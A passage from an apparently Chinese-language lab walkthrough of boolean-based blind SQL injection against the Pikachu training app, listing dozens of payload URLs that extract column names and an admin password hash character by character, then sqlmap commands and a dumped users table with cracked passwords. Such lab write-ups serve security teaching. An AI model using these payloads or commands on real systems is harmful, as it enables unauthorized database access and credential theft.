http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 6, 1) = 'o') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 7, 1) = 'r') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 2,1), 8, 1) = 'd') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询[+] 列名: password
列 3: password
[*] 正在探测表 users 的第 4 列名...
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1)) > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1)) = 5) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 列名长度: 5
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1), 1, 1) = 'l') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1), 2, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1), 3, 1) = 'v') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1), 4, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='pikachu' AND TABLE_NAME='users' LIMIT 3,1), 5, 1) = 'l') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询[+] 列名: level
列 4: level(4)探测数据
接下来探测users表的第一行数据,如下所示用户名为admin,根据密码存储的md5值可推断出密码为123456,其中md5加密后的值为e10adc3949ba59abbe56e057f20f883e,具体如下所示。
[*] 开始提取 users.id 的第1行数据
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT id FROM users LIMIT 0,1)) = 1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 数据长度: 1 字符
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT id FROM users LIMIT 0,1), 1, 1) = '1') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询[+] 提取完成: 1
4: 1[*] 开始提取 users.username 的第1行数据
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT username FROM users LIMIT 0,1)) > 4) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT username FROM users LIMIT 0,1)) = 5) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 数据长度: 5 字符
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 0,1), 1, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 0,1), 2, 1) = 'd') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 0,1), 3, 1) = 'm') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 0,1), 4, 1) = 'i') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 0,1), 5, 1) = 'n') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询[+] 提取完成: admin
4: admin[*] 开始提取 users.password 的第1行数据
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT password FROM users LIMIT 0,1)) = 32) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 数据长度: 32 字符
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 1, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 2, 1) = '1') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 3, 1) = '0') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 4, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 5, 1) = 'd') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 6, 1) = 'c') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 7, 1) = '3') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 8, 1) = '9') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 9, 1) = '4') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 10, 1) = '9') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 11, 1) = 'b') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 12, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 13, 1) = '5') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 14, 1) = '9') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 15, 1) = 'a') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 16, 1) = 'b') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 17, 1) = 'b') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 18, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 19, 1) = '5') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 20, 1) = '6') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 21, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 22, 1) = '0') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 23, 1) = '5') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 24, 1) = '7') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 25, 1) = 'f') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 26, 1) = '2') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 27, 1) = '0') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 28, 1) = 'f') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 29, 1) = '8') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 30, 1) = '8') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 31, 1) = '3') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT password FROM users LIMIT 0,1), 32, 1) = 'e') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询[+] 提取完成: e10adc3949ba59abbe56e057f20f883e
4: e10adc3949ba59abbe56e057f20f883e[*] 开始提取 users.level 的第1行数据
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (LENGTH((SELECT level FROM users LIMIT 0,1)) = 1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询
[+] 数据长度: 1 字符
http://192.168.59.1/pikachu/vul/sqli/sqli_blind_b.php/?name=lili' AND (CASE WHEN (SUBSTRING((SELECT level FROM users LIMIT 0,1), 1, 1) = '1') THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)--+&submit=查询[+] 提取完成: 1
4: 13、sqlmap渗透
python sqlmap.py -u "http://127.0.0.1/pikachu/vul/sqli/sqli_blind_b.php?name=mooyuan&submit=%E6%9F%A5%E8%AF%A2" --current-db --batch --dump
这个命令执行后只能找到基于时间的注入方法,提示如下所示。
GET parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 80 HTTP(s) requests:
---
Parameter: name (GET)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: name=mooyuan' AND (SELECT 7670 FROM (SELECT(SLEEP(5)))vJLD) AND 'Zxcy'='Zxcy&submit=%E6%9F%A5%E8%AF%A2
如果增加了--technique=B参数则直接无法进行渗透,提示没有注入点,具体如下所示。
[05:20:51] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=mn9mirug87r...aprvlnnef7'). Do you want to use those [Y/n] Y
[05:20:52] [INFO] checking if the target is protected by some kind of WAF/IPS
[05:20:52] [INFO] testing if the target URL content is stable
[05:20:52] [INFO] target URL content is stable
[05:20:52] [INFO] testing if GET parameter 'name' is dynamic
[05:20:53] [WARNING] GET parameter 'name' does not appear to be dynamic
[05:20:53] [WARNING] heuristic (basic) test shows that GET parameter 'name' might not be injectable
[05:20:53] [INFO] testing for SQL injection on GET parameter 'name'
[05:20:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[05:20:55] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[05:20:55] [WARNING] GET parameter 'name' does not seem to be injectable
[05:20:55] [INFO] testing if GET parameter 'submit' is dynamic
[05:20:55] [WARNING] GET parameter 'submit' does not appear to be dynamic
[05:20:55] [WARNING] heuristic (basic) test shows that GET parameter 'submit' might not be injectable
[05:20:55] [INFO] testing for SQL injection on GET parameter 'submit'
[05:20:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[05:20:59] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[05:20:59] [WARNING] GET parameter 'submit' does not seem to be injectable
[05:20:59] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[05:20:59] [WARNING] your sqlmap version is outdated
这是因为布尔型注入的渗透,sqlmap不清楚True和False时的输出,如果正确指定则可以正常渗透,具体命令如下所示。
sqlmap -u "http://127.0.0.1/pikachu/vul/sqli/sqli_blind_b.php?name=mooyuan&submit=%E6%9F%A5%E8%AF%A2" --current-db --batch --dump --technique=B --not-string="不存在"GET parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 13 HTTP(s) requests:
---
Parameter: name (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: name=mooyuan' AND 7085=7085 AND 'XcNF'='XcNF&submit=%E6%9F%A5%E8%AF%A2
---
Database: pikachu
Table: users
[3 entries]
+----+---------+-------------------------------------------+----------+
| id | level | password | username |
+----+---------+-------------------------------------------+----------+
| 1 | 1 | e10adc3949ba59abbe56e057f20f883e (123456) | admin |
| 2 | 2 | 670b14728ad9902aecba32e22fa4f6bd (000000) | pikachu |
| 3 | 3 | e99a18c428cb38d5f260853678922e03 (abc123) | test |
+----+---------+-------------------------------------------+----------+
